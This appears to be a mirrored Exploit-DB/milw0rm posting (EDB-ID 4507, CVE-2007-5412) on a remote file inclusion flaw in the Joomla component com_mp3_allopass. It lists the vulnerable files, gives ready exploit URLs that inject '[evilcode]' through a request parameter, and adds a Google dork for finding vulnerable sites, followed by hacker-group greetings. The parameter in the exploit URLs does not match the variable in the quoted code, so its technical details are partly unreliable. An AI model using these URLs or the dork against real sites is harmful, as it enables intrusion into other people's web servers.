- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4507
- Проверка EDB
-
- Пройдено
- Автор
- NOGE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5412
- Дата публикации
- 2007-10-10
Код:
# com_mp3_allopass joomla component Remote File Include Vulnerability
Component : com_mp3_allopass
Download file : http://www.joomlaratings.com
Dicovered by : NoGe
Contact : [email protected]
==================================================================================================================================
# Vulnerable file
/components/com_mp3_allopass/allopass.php
line 3 require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");
/components/com_mp3_allopass/allopass-error.php
line 2 require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");
# Exploit
http://localhost/path/components/com_mp3_allopass/allopass.php?mosConfig_live_site=[evilcode]
http://localhost/path/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=[evilcode]
# google dork
inurl:com_mp3_allopass
==================================================================================================================================
# Greetz
all member #papuahacker #nyubicrew #baliemhackerlink
skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke
yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq
http://kapukvalley.net member
==================================================================================================================================
# milw0rm.com [2007-10-10]- Источник
- www.exploit-db.com
